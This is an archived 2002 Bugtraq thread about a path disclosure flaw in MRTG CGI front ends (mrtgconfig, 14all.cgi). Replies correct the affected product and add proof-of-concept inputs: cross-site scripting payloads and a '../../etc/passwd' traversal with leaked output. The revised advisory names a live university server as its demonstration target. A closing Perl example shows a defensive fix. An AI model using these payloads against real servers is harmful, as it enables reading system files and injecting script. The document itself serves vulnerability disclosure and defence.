7943813 2002-02-04 02:18 +0200 /68 lines/ Tamer Sahin <ts@securityoffice.net>
Sent by: joel@lysator.liu.se
Imported: 2002-02-04 18:04 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External replies to: ts@securityoffice.net
Recipient: Bugtraq (import) <20785>
Subject: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Message-ID: <000e01c1ad11$8849c5f0$d5fb83d9@ts>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Mrtg Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
traffic load on network-links. Mrtg generates html pages containing
gif images which provide a live visual representation of this
traffic.
http://www.mrtg.org
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg cgi
script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg v2.090011
Mrtg v2.090006
Vulnerable:
Mrtg v2.090011
Mrtg v2.090006
And may be other.
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0 Fingerprint:
B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
Tbl6HDhKVnFPEy1DSB3/q3AH
=+kUc
-----END PGP SIGNATURE-----
(7943813) /Tamer Sahin <ts@securityoffice.net>/-----
Comment in text 7944923 by Barney Wolff <barney@databus.com>
7945975 2002-02-04 10:56 -0700 /63 lines/ Dave Ahmad <da@securityfocus.com>
Sent by: joel@lysator.liu.se
Imported: 2002-02-04 21:46 by Brevbäraren
External recipient: Barney Wolff <barney@databus.com>
External CC recipient: Tamer Sahin <ts@securityoffice.net>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20794>
Comment to text 7944923 by Barney Wolff <barney@databus.com>
Subject: Re: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: Dave Ahmad <da@securityfocus.com>
To: Barney Wolff <barney@databus.com>
Cc: Tamer Sahin <ts@securityoffice.net>, <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.43.0202041050560.18483-100000@mail.securityfocus.com>
Barney,
You're correct.. 'mrtg.cgi' is not part of MRTG. It's from a
completely independent utility called 'mrtgconfig'. The project
homepage is:
http://mrtgconfig.sourceforge.net/
The path disclosure issue (version 0.5.9):
[dma@victim mrtgconfig]$ /home/dma/mtrg/mrtgconfig/mrtg.cgi
(offline mode: enter name=value pairs on standard input)
cfg
Content-type: text/html
<H1>Software error:</H1>
<CODE>Can't open configuration file for mrtgconfig: No such file or
directory at /home/dma/mrtg/mrtgconfig/mrtg.cgi line 46,
<STDIN> chunk 1.
</CODE>
<P>
For help, please send mail to this site's webmaster, giving this error
message and the time and date of the error.
Dave Ahmad
SecurityFocus
www.securityfocus.com
On Mon, 4 Feb 2002, Barney Wolff wrote:
> Unless I'm terribly confused, mrtg only generates files and runs off
> cron, not as a cgi. So you're dealing with something other than mrtg
> itself. Also, the current version is 2.9.18pre1.
>
> Barney Wolff
>
> On Mon, Feb 04, 2002 at 02:18:54AM +0200, Tamer Sahin wrote:
> >
> > Summary:
> > If an attacker submits a web request containing unexpected arguments
> > for script variables, an error message will be displayed containing
> > the path to the webroot directory of the server running the Mrtg cgi
> > script.
> >
> > http://host/mrtg.cgi?cfg=blabla
> >
> > Tested:
> > Mrtg v2.090011
> > Mrtg v2.090006
> >
> > Vulnerable:
> > Mrtg v2.090011
> > Mrtg v2.090006
> >
> > And may be other.
>
(7945975) /Dave Ahmad <da@securityfocus.com>/(Reformatted)
7946902 2002-02-04 21:09 +0100 /92 lines/ Frog Man <leseulfrog@hotmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-02-04 23:34 by Brevbäraren
External recipient: ts@securityoffice.net
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20800>
Subject: Re: Mrtg Path Disclosure Vulnerability
------------------------------------------------------------
From: "Frog Man" <leseulfrog@hotmail.com>
To: ts@securityoffice.net
Cc: bugtraq@securityfocus.com
Message-ID: <F92E6l7GWzG7JEKVb5N000165f6@hotmail.com>
/mrtg.cgi?log=<script>alert('CSS')</script>
/mrtg.cgi?log=<script>alert('Cross Site Scripting')</script>
/mrtg.cgi?cfg=../../etc/passwd :
------------------- mrtg.cgi error ------------------------
Software error: ERROR: CFG Error Unknown Option
"root:PASS:0:0:root:/root" on line 2 or above. Check
doc/reference.txt for Help
------------------- mrtg.cgi error ------------------------
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Mrtg Path Disclosure Vulnerability
>
>Type:
>Input Validation Error
>
>Release Date:
>February 4, 2002
>
>Product / Vendor:
>The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the
>traffic load on network-links. Mrtg generates html pages containing
>gif images which provide a live visual representation of this
>traffic.
>
>http://www.mrtg.org
>
>Summary:
>If an attacker submits a web request containing unexpected arguments
>for script variables, an error message will be displayed containing
>the path to the webroot directory of the server running the Mrtg cgi
>script.
>
>http://host/mrtg.cgi?cfg=blabla
>
>Tested:
>Mrtg v2.090011
>Mrtg v2.090006
>
>Vulnerable:
>Mrtg v2.090011
>Mrtg v2.090006
>
>And may be other.
>
>Disclaimer:
>http://www.securityoffice.net is not responsible for the misuse or
>illegal use of any of the information and/or the software listed on
>this security advisory.
>
>Author:
>Tamer Sahin
>ts@securityoffice.net
>http://www.securityoffice.net
>
>Tamer Sahin
>http://www.securityoffice.net
>PGP Key ID: 0x2B5EDCB0 Fingerprint:
>B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGP 7.1
>
>iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD
>Tbl6HDhKVnFPEy1DSB3/q3AH
>=+kUc
>-----END PGP SIGNATURE-----
>
>
>
>
(7946902) /Frog Man <leseulfrog@hotmail.com>/(Reformatted)
7953529 2002-02-06 00:30 +0200 /69 lines/ Tamer Sahin <ts@securityoffice.net>
Sent by: joel@lysator.liu.se
Imported: 2002-02-05 23:49 by Brevbäraren
External recipient: bugtraq@securityfocus.com
External CC recipient: michael@michaelearls.com
External replies to: ts@securityoffice.net
Recipient: Bugtraq (import) <20837>
Subject: Mrtg Path Disclosure Vulnerability (Revised)
------------------------------------------------------------
From: "Tamer Sahin" <ts@securityoffice.net>
To: <bugtraq@securityfocus.com>
Cc: <michael@michaelearls.com>
Message-ID: <00ae01c1ae94$b2102580$718f83d9@ts>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
*/This is Mrtg Web Frontend 14all.cgi bug. You may find the revised
security announcement below/*
Mrtg/RRD 14all.cgi Path Disclosure Vulnerability
Type:
Input Validation Error
Release Date:
February 4, 2002
Product / Vendor:
14all.cgi is a CGI script to create html pages and graphics for Mrtg.
http://people.ee.ethz.ch/~oetiker/webtools/mrtg/mrtg-rrd.html
Summary:
If an attacker submits a web request containing unexpected arguments
for script variables, an error message will be displayed containing
the path to the webroot directory of the server running the Mrtg/RRD
14all.cgi script.
http://host/mrtg.cgi?cfg=blabla
Tested:
Mrtg/RRD 14all.cgi v1.1p15
Vulnerable:
Mrtg/RRD 14all.cgi v1.1p15
And may be other.
Demonstration:
http://barnes.bloomu.edu/cgi-bin/mrtg.cgi?cfg=blabla
Disclaimer:
http://www.securityoffice.net is not responsible for the misuse or
illegal use of any of the information and/or the software listed on
this security advisory.
Author:
Tamer Sahin
ts@securityoffice.net
http://www.securityoffice.net
Tamer Sahin
http://www.securityoffice.net
PGP Key ID: 0x2B5EDCB0
-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1
iQA/AwUBPGBc+buLpFMrXtywEQJRLACfQ6sMmsTi4fD3PG3p7AFDxmo3XogAnj58
fnyk5QpMwxQQ7WBFTQ/w+fj+
=rxm+
-----END PGP SIGNATURE-----
(7953529) /Tamer Sahin <ts@securityoffice.net>/-----
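
One way a CGI front end can avoid both the path disclosure and the `cfg=../../etc/passwd` behaviour reported in this thread, as an added example that is not code from mrtg.cgi, 14all.cgi or mrtgconfig: the `cfg` parameter is matched against an allow-list before it reaches `open`, and failure details go to the server log while the client receives a fixed message. The directory `/etc/mrtg` and the names `resolve_cfg`, `error_page` and `handle` are assumptions made for the illustration.

```perl
#!/usr/bin/perl
# Added example; hypothetical names and paths, not the scripts' own code.
use strict;
use warnings;
use File::Spec;

# Assumption: all configuration files live in one admin-chosen directory.
my $CFG_DIR = '/etc/mrtg';

# Map the untrusted cfg parameter to a file inside $CFG_DIR, or return
# nothing. Only a bare file name ending in .cfg is accepted, so slashes,
# "..", and markup such as <script> never reach open().
sub resolve_cfg {
    my ($name) = @_;
    return unless defined $name;
    return unless $name =~ /\A([A-Za-z0-9_-]{1,64}\.cfg)\z/;
    return File::Spec->catfile($CFG_DIR, $1);
}

# Details (script path, file path, $!) go to STDERR, which the web server
# writes to its error log. The client gets a fixed text/plain body that
# echoes nothing from the request.
sub error_page {
    my ($detail) = @_;
    print STDERR "mrtg-frontend: $detail\n";
    return "Status: 400 Bad Request\r\nContent-Type: text/plain\r\n\r\n"
         . "Invalid request.\n";
}

# Build the full CGI response for one value of the cfg parameter.
sub handle {
    my ($cfg_param) = @_;
    my $path = resolve_cfg($cfg_param)
        or return error_page('rejected cfg parameter');
    open(my $fh, '<', $path)
        or return error_page("cannot open $path: $!");
    close $fh;
    return "Content-Type: text/plain\r\n\r\nconfiguration accepted\n";
}

# Constructed inputs: the three parameter values quoted in the thread,
# plus one well-formed name.
for my $in ('blabla', '../../etc/passwd',
            "<script>alert('CSS')</script>", 'router1.cfg') {
    print "--- cfg=$in\n", handle($in);
}
```

With no `/etc/mrtg/router1.cfg` present, all four inputs produce the same generic response, and the reason for each failure appears only on STDERR.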